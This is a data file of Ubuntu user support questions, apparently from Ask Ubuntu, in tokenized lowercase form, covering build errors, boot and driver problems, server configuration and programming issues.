277176	could not locate berkeleydb	i am trying to install a bitcoin-repote-rpc miner from [ http : //www.mediafire.com/file/ve608cl5mk1ka3l/bitcoin-remote-rpc-20110227-src.zip ] on my laptop running on ubuntu quantal . i need to use cmake to build the project . i have encountered a few errors and i have managed to solve them by installing the dependencies . now the last bit which i am unable to solve is this error message cmake error at cmakelists.txt:112 ( message ) : could not locate berkeleydb i would like to know how to solve this problem . thanking you in advance . when i run dpkg -l 'libdb* ' | grep '^ii' i get the following packages already installed ii libdb5.1 : i386 5.1.29-5ubuntu2 i386 berkeley v5.1 database libraries [ runtime ] ii libdbus-1-3 : i386 1.6.4-1ubuntu4 i386 simple interprocess messaging system ( library ) ii libdbus-glib-1-2 : i386 0.100-1ubuntu0.1 i386 simple interprocess messaging system ( glib-based shared library ) ii libdbusmenu-glib4 : i386 12.10.2-0ubuntu1 i386 library for passing menus over dbus ii libdbusmenu-gtk3-4 : i386 12.10.2-0ubuntu1 i386 library for passing menus over dbus - gtk+ version ii libdbusmenu-gtk4 : i386 12.10.2-0ubuntu1 i386 library for passing menus over dbus - gtk+ version ii libdbusmenu-qt2 : i386 0.9.2-0ubuntu3 i386 qt implementation of the dbusmenu protocol and this is the part from the cmakelists.txt which seems to be producing the error # use bdb local module find_package ( berkeleydb ) if ( db_include_dir ) include_directories ( $ { db_include_dir } ) else ( db_include_dir ) message ( fatal_error `` could not locate berkeleydb '' ) endif ( db_include_dir )
277177	doubts on remote access on ubuntu 12.10 via freenx	i 'm currently a little confused : what i 'd like to do is to remotely access my ubuntu 12.10 machine from an external device . i thought it would be straightforward , but i 'm finding lots of issues and a scarcity of help . looking around i was finally able to pin-down the solution to freenx : it should be able to give me remote control over my machine with visual interface ( not command-line ) . the problem is that its installation is a real hell : i tried to follow both official ubuntu documentation and different tutorials ( such as this one which should be specifically tailored on ubuntu 12.10 ) , but i always ended up with errors and a non-functioning server . is there somebody who was able to create a functioning freenx server on ubuntu 12.10 ? how did you made it ?
277178	how to backup data on my home drive from a ubuntu desktop 10.10 that crashed ?	i booted the system from ubuntu 12.0.4 desktop lts live usb ... now i need to know how i could access/backup the data on my home drive ? when i boot i only see the file system for the bootable usb drive and folders such as desktop etc ... i do not see any option to access the file system for the crashed os on the hard drive of my laptop ...
277181	unable to install ubuntu 7.10 to hp pavilion p6 2335 il desktop	i have bought hp pavilion p62335il laptop recently which has only dos . i am trying to install ubuntu into this machine . i am getting a blank screen immediately after selecting the 'start or install ubuntu ' option . any help in this regard will be highly appreciated . thanks very much .
277183	running ubuntu in usb but with a lot of ram ; how to run program from ram ?	i installed ubuntu on a usb drive and run it with my laptop , which has over 10gb of ram . the system is rather slow . i would want to run some major programs like chrome directly from ram instead of the usb . is there a way to configure it ? furthermore can the change i made be automatically save back to the usb ? ( sorry for this newbie question but i searched and only find instruction like tmpfs and /dev/shm without much explanations , not sure if that is what i want . )
277186	how to fix hibernation	i have an ibm thinkpad t42 . i ran the hibernation command sudo pm-hibernate but when i startup my computer , i see the windows i had open before but i do n't see the mouse and ca n't do anything or i see the mouse can move it around but ca n't do anything . it shows me the last session i had open but am not able to do anything with it . i have tried installing uswsusp and running the command s2disk but it did the same thing .
277187	localhost not connecting	i am not able to connect to localhost it showed me the error : forbidden you do n't have permission to access / on this server . apache/2.2.22 ( ubuntu ) server at localhost port 80 i removed apache2 : sudo apt-get remove apache2* and then i reinstalled it , but it still shows the same error . please someone help me , as i am new to ubuntu i do n't know much .
277188	what 's the difference between `` cd ../ '' vs. `` cd /.. '' ?	what do these two commands mean ? cd ../ cd /.. i am ending up in two directories upwards the tree on the first command and in the root directory from the second command . why does that happen ?
277190	how to package an application icon properly ?	there is an blog article on ubuntu developer blog . http : //developer.ubuntu.com/2012/02/how-to-prepare-a-compiled-application-for-ubuntu-software-center/ i followed all steps exactly . but the application seems to have no icon when i search it in the dash . the dash displays only blank white icon . i am using ubuntu 12.04
277194	i ca n't change windows buttons to the right side with ubuntu tweak	i am running ubuntu 12.10 quantal , and i have ubuntu tweak already installed . i am tring to change windows buttons to the right side . i choose option `` right '' in ut ( and nothing happens ) . when i close ut and open again , option `` left '' is still selected . what 's wrong with this ? ! sorry for my english , and thanks a lot for help .
277195	why liveusb would n't boot on asus eeepc 1015cx netbook ?	i 'm creating a usb disk for ubuntu by iso2usb and i ca n't boot . i choose usb disk from beginning and it says eject disk or another media and press any key to restart . no setup page , no nothing . how can i install ubuntu ?
277198	how to dual boot windows 8 and ubuntu 12.10 on hp pavilion 14-b010tx	i 've used ubuntu on my old compaq v26633tn for a few years , but it 's wearing out after 9 years use . i 've bought a replacement hp pavilion 14-b010tx ( cd58pa ) with factory installed windows 8 and msata 32gb and hdd 750gb . i got hp service to add another 4gb of ram ( now 8gb ) and they did n't adjust the intel rst raid0 array from 4gb to 8gb which after a while i fixed . i 'd like to keep windows 8 , but mainly work on ubuntu so i am after a dual boot uefi system . when installing 12.10 i tried to partition the hdd to have windows on the first 100gb then ubuntu on the next 100gb and hope to have the remainder for files , photos , etc . from just after installation http : //paste.ubuntu.com/5651599/ sda1:419mb : ntfs : basic data partition : hidden , diag ; sda2:273mb : fat32 : efi system partition : boot ; sda3:134mb : :microsoft reserved partition : msftres ; sda4:100gb : ntfs : basic data partition : ; sda6:300mb : ext4 : : ; sda7:100gb : ext4 : : ; sda8:8000mb : linux-swap ( v1 ) : : ; sda5:27.2gb : ntfs : basic data partition : hidden ; sdb1:33.6mb : :microsoft reserved partition : msftres ; sdb2:8590mb : :basic data partition : ; here 's a summary of how it went . at first i could access windows but not ubuntu so made changes with easybcd then boot repair from a live usb it then booted into ubuntu but not windows choosing `` system setup '' in grub menu - > f9 - > troubleshoot - > windows repairs i could boot into windows but not ubuntu i ran easybcd to set windows default os , deleted the previous ubuntu , then added ( grub 2 ) ubuntu using the auto find boot option . now the option to boot to windows has disappeared and ubuntu 12.10 is now 2 options in windows boot manager ( and hp system setup interface ) neither work but return errors file : \nst\autoneogrub1.mbr status : 0xc000000f info : the application or operating system could n't be loaded because a required file is missing or contains errors . pressing esc goes to the hp system settings menu where : continue to ubuntu 12.10 ( on volume 4 ) goes back to the above errors choose an operating system gives the same option twice : ubuntu 12.10 on volume 4 . ( it used to also give windows 8 ) use a device gives the options : internal hd or ssd twice or ubuntu ( using this option i can get into grub2 then ubuntu ) i get the two options for ubuntu also under troubleshoot - > recovery manager and advanced options - > system restore or system image recovery or automatic repair in ubuntu i had a kernel panic whenever attempting to connect to the internet due to rt3290 wireless driver not working . updated the kernel to 3.9 and it now works ok . i did a recomended boot repair it now boots straight to windows boot manager with the 2 options of ubuntu or ubuntu and neither work . i can get to ubuntu via esc - > hp system settings - > use a device - > ubuntu - > grub menu - > ubuntu then there are some errors before the ubuntu loading screen : udevd [ 107 ] : sender uid=65534 , message ignored [ 9.946587 ] kvm : disabled by bios [ 9.950349 ] kvm : disabled by bios [ 9.962701 ] kvm : disabled by bios [ 9.970359 ] kvm : disabled by bios [ 10.164945 ] nouveau i [ device ] [ 0000:01:00.0 ] unknown fermi chipset [ 10.164993 ] nouveau e [ device ] [ 0000:01:00.0 ] unknown chipset , 0x0d70000a2 [ 10.165034 ] nouveau e [ drm ] failed to create 0x80000080 , -22 http : //paste.ubuntu.com/5670228/ etc/defaults/grub/grub file details : grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' i 'm guessing i need to get grub as the default boot menu back then find the correct efi file for windows ? i 'm all out of ideas and do n't know where to from here . any help would be appreciated .
277200	installing kernel from tarball	i 'm using ubuntu 12.10 installed alongside windows and the default loader is grub . i 've downloaded kernel 3.8.5 tar.xz file and want to install without erasing the existing 3.5 kernel . following the instructions given in the readme file it said ncurses library is required . i extracted the file and did the following . the terminal output is shown below . root @ ubuntu : /home/prasanna/linux-3.8.5 # make o=/home/name/build/kernel menuconfig hostcc scripts/basic/fixdep gen /home/name/build/kernel/makefile hostcc scripts/kconfig/conf.o *** unable to find the ncurses libraries or the *** required header files . *** 'make menuconfig ' requires the ncurses libraries . *** *** install ncurses ( ncurses-devel ) and try again . *** make [ 2 ] : *** [ scripts/kconfig/dochecklxdialog ] error 1 make [ 1 ] : *** [ menuconfig ] error 2 make : *** [ sub-make ] error 2 after installing ncurses , i ran the command menuconfig a dialogue box appeared and cound n't proceed much . i tried with `` config '' selecting default optioins . make o=/home/name/build/kernel sudo make o=/home/name/build/kernel modules_install install when i entered the first command of above got error and it read : run `` make mproper '' . and this command said no configuration file . i 'm truly not understanding what 's happening . please help me out suggesting any other easy way to install the same tar.xz file of linux kernel with default options without erasing the older one so that i get choices of kernel at boot up .
277205	problems with unity and gnome classic desktops - how to reinstall and clean them	i have ubuntu 12.04.02 and i always use kde 4.10.1 . sometimes i need to switch to unity or gnome classic ( with effects ) , the problem is that when i log in with one of them i ca n't access `` settings menu '' or other menus because they do not appear . i think i have messed up some time ago but i do n't remember . maybe it is a problem related to compiz . i have tried to use unity -- reset and rm -rf .gnome .gnome2 .gconf .gconfd .metacity commands to reset gnome2 and unity but still the same thing . so is there a way to reinstall compiz or gnome classic and unity in order to clean them like when i have installed ubuntu first time ? ( i just would like to reinstall them without making any changes to kde desktop . )
277208	how to exclude files from being synced by u1 syncdaemon ?	i am exploring ways to use u1 as a backup tool ( indeed , it is n't , but i signed up thinking it was , so now i 'm trying to make the best of it : - ) ) one way i 'm contemplating is excluding backup files from being handled by the u1 syncdaemon . unfortunately , it seems that such exclusion works only one way , namely from the local host to the u1 cloud , and not the other way around . for instance : in `` /etc/xdg/ubuntuone/syncdaemon.conf '' i expanded `` ignore.default '' with the line `` \aduplicity- . *\z '' to exclude duplicity backup files from being synced . when , by way of test , i create a file named `` duplicity-blabla '' in the synced local folder , the file is not uploaded to the u1 cloud folder , as i would expect . however , when i upload the same file to the u1 cloud folder via the u1 web interface or through duplicity ( via the command line ) , the file is synced to the local folder . in nautilus , the automatically downloaded file gets the green 'synced'-checkmark . yet , it is possible to delete the downloaded files from the local folder without deleting the remote copy from the u1 cloud . why does the syncdaemon download excluded files from the u1 cloud , and is there a way of stopping it from doing so ?
277209	problem with driver of ati graphic card	i followed the instructions here what is the correct way to install ati catalyst video drivers ( fglrx ) ? in the second part of the subject they said installing the ati catalyst drivers for 12.10 when i reach the line command sudo sh amd-driver-12-6-x86_64.run the terminal type that problem : detected configuration : architecture : i686 ( 32-bit ) x server : x.org 6.9 or later loki_setup : directory : ( null ) dkms part of installation failed . please refer to /usr/share/ati/fglrx-install.log for details and when i open that file it has that log : check if system has the tools required for installation . uninstalling any previously installed drivers . creating symlink /var/lib/dkms/fglrx/8.98/source - > /usr/src/fglrx-8.98 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . cd /var/lib/dkms/fglrx/8.98/build ; sh make.sh -- nohints -- uname_r=3.5.0-26-generic -- norootcheck ... ... ( bad exit status : 1 ) [ error ] kernel module : failed to build fglrx-8.98 with dkms [ error ] kernel module : removing fglrx-8.98 from dkms -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 8.98 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . [ reboot ] kernel module : update-initramfs can any one help me ?
277212	install junit with oracle java 7 already instaled	i am running ubuntu 12.10 with oracle java 7 installed ( as described here ) . i want to install junit 4 but if i do a simple sudo apt-get install junit , it starts to download openjdk and the like ( which i do n't want ) . how to manually do it ? and from where do i download and install . please help !
277214	how to return to the recovery mode menu from shell	after dropping to root shell from recovery mode how to return to the recovery mode menu ? i have only wifi connection and i do not know what repair broken packeges menu entry does so i want to drop to shell and connect to my router then come back to the menu and press that recover broken packages item .
277215	make a sound once process is complete	i have started a long process through a terminal . is it possible to make the ubuntu terminal make a sound once the process is complete ? this way , i donât need to keep checking , but will instead be notified through a sound .
277216	how to start firefox or other gui application on windows 7 remotely	i am using ubuntu locally . also i have another server running windows 7 . i want to start firefox or notepad on windows 7 through the bash on ubuntu . and what i want is to let the firefox/notepad windows displayed on windows 7 like i started them locally on windows 7 . i have ssh configured on windows 7 .
277217	how can i print the line numbers of gedit ?	i want to print the line numbers along with c source-code in the text editor `` gedit '' . i am tired to look all day at the display . thank you for any time or effort .
277227	problem with wifi reconnecting - repeatedly asking for passowrd	i have installed ubuntu 12.04 and ca n't connect to my home wifi . when i create wifi hotspot on my galaxy s3 , i do n't have any problem but when i connect to my wifi i enter password and it still tries reconnecting but wo n't connect and after 1-2 minute and again asks for password . can anyone help ?
277230	can rhythmbox play media on my dlna tv ?	i have rygel configured as dlna server and it autostarts with my session -- > cool on my tv i can browse/play the music , but the interface with the remote is horrible . -- > not cool so the question is , can i let rhythmbox find my music hosted by rygel [ it can , i found that ] , but more important , can it somehow tell my tv to play that music file ? edit : so the end goal is to be listen to my music playing on the tv while working , and use my media keys/rhythmbox ui to change songs , without turning my head and get cranky while pushing the remote buttons .
277231	limited network transfer speeds	i 'm running ubuntu server 12.10 i have apache installed on both the ubuntu server and a virtualbox windows server running on the ubuntu as a guest . however when i download files from my webserver the rates go down to 200kbps this happens on both the ubuntu server and the windows server . it 's as if something is limiting the network speeds for apache in specific . our minecraft server on the network does n't lag and gets great speeds we did speedtest.net and came out with 70mbps download and 44mbps upload . what could be limiting my network speeds ? last packages i installed before this happened virtualbox and vmware and i removed vmware
277234	post dual install , how to view the files on c : / drive ?	after using the windows installer , and running now ubuntu , i need t know ... how to view the files on c : / drive [ it contains the windows installation + documents and the ubuntu also ] i selected the ubuntu space to be 10gb , is that enough ? and if not .. how to increase it ! thanks
277238	why does avconv not work to record my screen ?	i am trying to record my screen ( without sound ) using avconv but i think there is something wrong with it . i gave the command avconv -f x11grab -s hd720 -r 30 -i 0:0 sample.mov it ends up with an error [ x11grab @ 0x84c03c0 ] device : 0:0 - > display : 0:0 x : 0 y : 0 width : 1280 height : 720 no protocol specified [ x11grab @ 0x84c03c0 ] could not open x display . 0:0 : input/output error am i doing something wrong if , please tell me the solution
277243	12.04lts wo n't fully burn onto dvd	after burning the image of 12.04lts onto a disk it wo n't install and i find that the image is 4mb too big for a 4.35gb dvd disc . can any one help me here to cut down the file size or is it a case of just using a bootable usb stick instead .
277245	bcm43142 drivers for ubuntu 12.10 32-bit	related to how do i install bcm43142 wireless drivers for dell vostro 3460/3560 ? . that question is not reflecting a solution for ubuntu 12.10 32-bit .
277254	programming c++	heyy can somebody help me with c++ ? i know this is maybe not the best place but i do n't find anything on the web . so i want to do a if-statement like this if ( *it == '\ ' ) { //do something } but c++ recognize the '\ ' not as an string : s please help
277257	i want to install ubuntu 12.10 , on a partition that i have created	i wanted to install 12.10 , but also wanted to keep windows 8 , so i created another partition e : with 29gb space , and now i want to install ubuntu on that partition is that possible in any way ?
277260	splitting audio channels using pulseaudio	my mission is record desktop using avconv ( ffmpeg ) + record microphone input + use sphinx program which also need the same microphone for voice control . now , the problem is that if i start sphinx first , then i ca n't start avconv ( because microphone input is already busy by sphinx ) , and vice versa . i wonder , how to use pulseaudio to split channel , or to make some virtual channel to succeed in my mission . note : i 'm starting avconv with next command : avconv -f x11grab -r 25 -s 1024x768 -i :0.0 -f alsa -ac 2 -i pulse -ar 22050 output.flv should i something also change in that command ? btw . i used recordmydesktop before , but encoding was too slow so i decided to use avconv . thank you !
277262	ramifications of uninstalling gcc 4.7 in leu of gcc 4.6 in quantal ?	i currently have both the gcc-4.6 and gcc-4.7 packages installed in quantal . i do a lot of software development but have n't had a need for any features that are specific to gcc 4.7 . therefore , in order to conserve space , i thought it would be a good idea to remove gcc 4.7 . unfortunately : nathan @ nathan-ubuntu : ~ $ sudo apt-get autoremove gcc-4.7 reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : build-essential dkms g++ g++-4.7 gcc gcc-4.7 libstdc++6-4.7-dev nvidia-current-updates 0 upgraded , 0 newly installed , 8 to remove and 0 not upgraded . after this operation , 250 mb disk space will be freed . do you want to continue [ y/n ] ? here 's where i become a little nervous . some of the packages being removed ( like build-essential ) are just meta-packages and wo n't cause any problems . however , some of them i 'm not so sure about . for example , nvidia-current-updates is n't a meta-package . in fact , it 's a 66 mb package . if it helps , i am using the nvidia binary driver ( noveau does n't work on my hardware ) . is it safe to continue ? will i lose anything important ? edit : here is the output of apt-cache rdepends gcc-4.7 : gcc-4.7 reverse depends : gcc-4.7 : i386 llvm-gcc-4.7 gccgo-4.7 gcc-4.7-locales fixincludes |dragonegg-4.7 gobjc-4.7 gfortran-4.7 gcj-4.7-jdk gcc-4.7-plugin-dev gcc-4.7-multilib gcc g++-4.7 g++
277264	what free ubuntu-compatible software exists for the 3d visualisation of biologic proteins and peptides ?	what free ubuntu-compatible software exists for the 3d visualisation of biologic proteins and peptides ? i asked this question http : //chemistry.stackexchange.com/questions/4543/what-free-linux-compatible-software-exists-for-the-3d-virtualisation-of-biologic ? but it got closed because it was software recommendation which is off-topic for chemistry stackexchange but i thought it would n't be off-topic for here . i am running 32 bit 12.10 if it is relevant .
277266	how to set the latex font size in inkscape ?	in inkscape using extensions- > render- > latex formula you can enter latex into your inkscape image . the default font is huge however . how can you change it to something smaller ? alternatively , is there a better way to enter latex in an inkscape image that is easy to install in quantal ?
277270	i am using ubuntu 8.10 and i want to upgrade to the latest version	i just installed ubuntu 8.10 ( from live cd i found at my house ) on my mbpro . i want to upgrade to the latest version and i do n't know how ... . i know this must be pretty basic but i am new at this ...
277275	installed xubuntu-desktop on lubuntu - can not login to xubuntu/xfce session	so , i installed the xubuntu-desktop package on my lubuntu netbook , but when i went to login to a xubuntu session nothing happened . the screen simply went momentarily blank and then came up with the original login screen again . i tried with xfce session and got the same result . i was logging in with my ordinary lubuntu details . i did find one thing to try , which i did , which was to reset xauthority ... not sure what that is but it did n't help anyway . i have n't really found anything else similar to this problem , so i thought i 'd ask here if anyone else had seen or experienced a similar issue .
277277	ca n't access phpmyadmin in ubuntu 12.10 64bit after installing xampp	i just re-installed ubuntu because i had been playing with a driver which i should n't have done . i did n't have a backup ( though i backed up the important documents etc etc ) so i got ta reinstall these several applications . so , i installed xampp and made so i could change stuff in htdocs . i wanted to access a database with phpmyadmin , but i could n't access it because it says : access forbidden ! new xampp security concept : access to the requested object is only available from the local network . this setting can be configured in the file `` httpd-xampp.conf '' . if you think this is a server error , please contact the webmaster . error 403 127.0.0.1 apache/2.4.3 ( unix ) openssl/1.0.1c php/5.4.7 i 've been searching on all over google for solutions and absolutely none of them help . all of them doing some minor changes in `` httpd-xampp.conf '' and it seems to work for them , but it just does n't work for me . the context i was told to change in `` httpd-xampp.conf '' look like this : # since xampp 1.4.3 < directory “/opt/lampp/phpmyadmin” > allowoverride authconfig limit order allow , deny allow from all require all granted < /directory > and # new xampp security concept < locationmatch “^/ ( ? i : ( ? : xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info ) ) ” > order deny , allow allow from all allow from : :1 127.0.0.0/8 \ fc00 : :/7 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 \ fe80 : :/10 169.254.0.0/16 errordocument 403 /error/xampp_forbidden.html.var < /locationmatch > what can i do to make phpmyadmin work ?
277282	is there an application similar to everdesk for linux/ubuntu ?	i am looking for a file manager that stores emails together with other documents in the same folders similar to everdesk .
277284	execute script when network interface is up	i have this piece of bash script : internal= $ ( /sbin/ifconfig $ adapter | grep `` inet addr '' | awk -f : ' { print $ 2 } ' | awk ' { print $ 1 } ' ) $ adapter= '' eth0 '' i want to execute this until internal has the correct value and after that i want to go to the rest of my script do you have any ideas how i could deal with that ? after that i have code it in order to send the ip via sms ! thank you in advance .
277288	dlclose does not call library destructors , dlopen called just once	consider the following code for a dynamic loaded library built with g++-4.7 on linux , -fpic and linked with -rdynamic option : typedef std : :vector < void* > cbregister_t ; struct wrapper { cbregister_t instance ; wrapper ( ) : instance ( ) { hdebuglog ( `` wrapper ctor ! `` ) ; } ~wrapper ( ) { hdebuglog ( `` wrapper destructor ! `` ) ; } } ; inline cbregister_t & getlibraryunregistermap ( ) { static wrapper unregisterlibrarymap ; hdebuglog ( `` getlibraryunregistermap : we have `` < < unregisterlibrarymap.instance.size ( ) < < `` elements . the address of the map is `` < < & unregisterlibrarymap.instance ) ; return unregisterlibrarymap.instance ; } void registerlibrary ( void* p ) { auto & map = getlibraryunregistermap ( ) ; map.push_back ( p ) ; } void unregisterlibrary ( ) { auto & map = getlibraryunregistermap ( ) ; } void __attribute__ ( ( constructor ) ) library_init ( ) { static somedata cbcontainer ; hdebuglog ( `` library constructor : address of static cbcontainer is : `` < < & cbcontainer ) ; registerlibrary ( & cbcontainer ) ; } void __attribute__ ( ( destructor ) ) library_fini ( ) { unregisterlibrary ( ) ; } this code loads fine from a client with dlopen and the rtld_now flag . the library constructor is called . the problem happens when i call dlclose on the handle . it gives status zero , meaning that it was successful . but the library destructor library_fini is not called . dlopen is called on a single place so the reference count should not be a problem , but in order to be absolutely sure that there are really no references dangling i tried doing the dlclose several times : int result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : closing library : `` < < librarypath ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 1 failed with error : `` < < result < < `` = > `` ) ; result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 2 failed with error : `` < < result < < `` = > `` ) ; result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 3 failed with error : `` < < result < < `` = > `` ) ; result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 4 failed with error : `` < < result < < `` = > `` ) ; result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 5 failed with error : `` < < result < < `` = > `` ) ; result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 6 failed with error : `` < < result < < `` = > `` ) ; result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 7 failed with error : `` < < result < < `` = > `` ) ; result = dlclose ( handle ) ; hdebuglog ( `` library : :dynamiclibraryclose : dlclose 8 failed with error : `` < < result < < `` = > `` ) ; hassertmsg ( ! librarypath.empty ( ) , `` library path is not set '' ) ; hassertmsg ( 0 == dlopen ( librarypath.c_str ( ) , rtld_noload ) , `` library is still loaded '' ) ; all those debug logs show that each time i call dlclose the status result is zero . success ! the last assertion , which does n't fail , confirms that the library is not resident anymore . but at this point library_fini has not been called yet ! this behavior is definitely a bug , either on gcc or ld.so ( or whatever is using linux/ubuntu to dynamically load libraries these days ) . this behavior clearly is not what the standard says , because library destructors should be guaranteed to be run if the reference count is zero before dlclose returns . library destructors happen to be run after the wrapper.instance is destroyed , which renders the library destructor completely useless , as is not able to do any finalization of the data
277290	how do i run autocad 13 ( not 2013 , but # 13 ) on ubuntu ?	do i try to get ubuntu to run it or is there a compatible cad program for ubuntu that sees autocad files ? when i try to install , it is asking for a 32bit system . i last had it running in xp
277298	how can i reduce the delay for dragging a file into another window or application ?	i 'm sure the delay has its reason . but it is possible to reduce the delay , which is needed to drag files from one window into another or into an application ? example : if you open two nautilus windows and want to drag some files from one to the other , you ( at least i ) have to wait like a second to really move the file . if i 'm not waiting nothing will happen . another example would be dragging files to vlc . some specs : using a hp pavillion dv7 1170eg . you can find detailed specs here . and i 'm using nvidia driver .
277302	unmet dependencies installing catalyst	i 've been trying to install the catalyst stuff as per this web site and i get 'unmet dependencies ... ' . i 'm an old man and i just want to use mythbuntu . the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch
277303	can i develop a 2d game with just qml ?	i have a bit of interest in developing for ubuntu touch ( i have little to no real coding experience also ) , but my main interest is trying to develop a 2d game . from my understanding , i would either have to use qml for the interface + another language for the game itself , or just use another language for the interface and game , but pretty much , qml is only good for interfaces . is this true ? if so , what 's the best choice for another programming language to learn ?
277306	is it possible to install ubuntu from a smartphone ?	so , i 'm in a situation were i want to install ubuntu in my laptop ( currently running windows 8 ) but i do n't happen to have pendrives , cds or the like available . the only `` external '' device i have with me is a samsung galaxy s2 with a mini sd card in it . is it possible to use the phone as a pendrive to install ubuntu from it somehow ? ( without damaging the phone 's os and data )
277312	where do i find out about the details and reasons for the patches applied to a package ?	i am trying to build a package and i am having a problem building it . one ( or more ) of the patches to doxygen installed with 12.04.1 ( precise ) , 1.7.4-3 causes doxygen to not run my filter script over by tcl files , if the file is named with an extension of .tcl ( the normal extension for tcl files ) . if the extension is something else , like .src , the filter is run as expected . i use .tcl for library or helper files that are explictly sources and .src for 'main ' programs that are not . ( yes , i have the proper file name patterns , etc . in the doxyfiles -- my whole package builds just fine under centos 5 and centos 6 , and under centos 5 , i am even using an rpm i built of doxygen 1.7.4 ( basically an unpatched version ) . when i build doxygen manually without the ubuntu/debian patches under ubuntu 12.04.1 , it also works correctly . the installed version does not work correctly . i think one ( or more ? ) of the patches breaks something in doxygen . the changelog is not very enlightening . i will be creating a trivial package that illustrates the problem tomorrow .
277317	why indicator-weather does not work in ubuntu 12.04	i installed the weather indicator by using sudo apt-get install indicator-weather then i started its configuration . however at the last step of configuration , i pressed apply and nothing happened . it stayed there frozen . could anyone tell me how to fix it ?
277331	what is the difference between `command` and `./command` ?	i found that sometime i use the command to run a command , but sometime i use the ./command to run another command . what is the difference ?
277337	libreoffice documents spill over into workplace below	i have libreoffice 3.6.2.2 my problem is that documents sometimes ( not always , it seems to be random ) spill over into workplace below . the typing area is all on the screen , but the bottom part of the frame which shows what page i 'm on etc . is off the screen and i find it when i go down to the workplace below . and the line that contains the find box is completely lost in the middle somewhere .
277339	has anyone installed real player ?	i have recently defected to linux from windows and no regret , almost . i sort of miss real player . i have found that it is possible to have it installed which i did through helix player website , but this ( rp 11 and ubuntu12.10 ) does not even play dvd . i know rp is not supported by ubuntu , but what does it exactly mean ? is there anyway to use real player with ubuntu ?
277346	can not access the hardware	last night i did a very stupid thing by changing the owner of the directory /usr using the following commands su password : chown username : username /usr now the problem is that i can not access the network card ( i.e . i can not access the wifi ) , sound card ( i.e . i can not control the sound and also the sound card is not shown in the sound settings ) and also i can not use the sudo command to gain the super user privileges . need help as soon as possible . thank you in advance .
277348	send , but not receive email	i followed the tutorial : http : //www.howtoforge.com/perfect-server-ubuntu-12.04-lts-nginx-bind-dovecot-ispconfig-3 to configure my ubuntu 12.04 vps server , the mail server sending this email only but do not receive any email provider . what might be happening ? /etc/postfix/main.cf http : //pastebin.com/cxm215vk /etc/postfix/master.cf http : //pastebin.com/zfvskbtx mailq : mail queue is empty telnet mail.techmall.com.br 25 root @ server : ~ # telnet mail.techmall.com.br 25 trying 198.199.65.44 ... connected to techmall.com.br . escape character is '^ ] ' . 220 server.techmall.com.br esmtp postfix ( ubuntu ) quit 221 2.0.0 bye connection closed by foreign host . iptables -l http : //pastebin.com/jz5xjln2 thanks
277349	wusb54g ( rt2500pci ) -- speed at 300k/s before going to sleep , 200b/s after waking from sleep . any solutions ?	what problem in the world has ralink had with the linux 3.x kernel ? ! in the pre-3.x days , from jaunty to karmic to lucid to maverick to natty , everything was fine with rt2500 and rt2800-based cards ( have two linksys cards that both use ralink chips -- a wusb54g and a wmp600n ) . old desktop has problems , and my mother gets a mac and decides to hand down the other home-built desktop ( which had a bcm4231-based wmp300n in it ) , so i end up using the broadcom binary blob for a while , until ubuntu 12.10 , which ends up with dependency errors trying to install the sta driver from the cd . so , i remembered that the wmp600n worked fine back in the day , and decided to order another one . this time , absolutely no go . the rt2800pci driver is nuts . it keeps hanging , failing to connect , giving me i/o errors when i try to `` ifconfig wlan0 up '' , and all sorts of crazy stuff . the wusb54g ( which i 've had for a long time ) , meanwhile , works fine ... until it becomes inactive . when i first boot the computer , the wusb54g does give me speeds upwards of 300k/s ( typical for an at & t dsl network -- oh , well ) and for quite some time continues that trend . then , after say 5 minutes of not using the adapter , when i go to use the adapter again , my download speed drops sharply -- to 300b/s at the most , and half the time the connection is idle . and here i thought ralnk drivers are open source ! what happened ? !
277350	ubuntu installed successfully but not booting	i have installed ubuntu on my lappy alongside with windows7 on drivee ( windows is in drivec ) . when installing ubuntu it did n't ask any thing it ask only whether you want to install alongside with windows . i selected that option . there was message that installation was successful . after restarting it directly boots to windows it 's not asking to select os and drivee which i have installed ubuntu is not visible . please give solution to my problem
277351	export package [ eclipse ]	i am just wondering how do i export a .deb package for ubuntu software centre in eclipse ? i have created an application that runs python and webkit now i wish to submit to the software centre . how do i export a .deb file ?
277354	how to edit a backported package before uploading it to a ppa ?	i 'm attempting to backport clang 3.2 to quantal from raring . thinking this would be a relatively painless process , i ran the following command : backportpackage -s raring -d quantal -u ppa : george-edison55/clang3.2-backports clang the package was uploaded to the ppa without any errors and built without any errors as well . unfortunately , it can not be installed because the debian/control file contains the following dependencies : depends : ... libgcc-4.7-dev , libobjc-4.7-dev ... those packages do not exist in quantal . the contents of those packages is contained in the gcc-4.7 and gobjc-4.7 packages instead . my problem is that i have no idea how to make the change before uploading the package to my ppa . i tried instructing backportpackage not to upload to my ppa and dump the files in /tmp/clang3.2 where i edited them . however , attempting to upload the package simply results in the original .tar.gz being downloaded again and overwriting my changes . what is the proper way of doing this ?
277357	how to read an .atom file from the data liberation front	i downloaded my blogger history from google takeout , and got an '.atom ' file . are there any utilities in ubuntu that i can use to easily read the archive ? it 's just an xml file and i can see that all the important text is in there , but i was hoping for something that would give me a prettier view of the entries .
277363	gnuplot not showing the graph window	i am using gnuplot under ubuntu 12.10 . when i type in terminal : gnuplot > plot sin ( x ) it only shows next step : gnuplot > but it does n't show the graph plotting windows . what can i do to find the problem ?
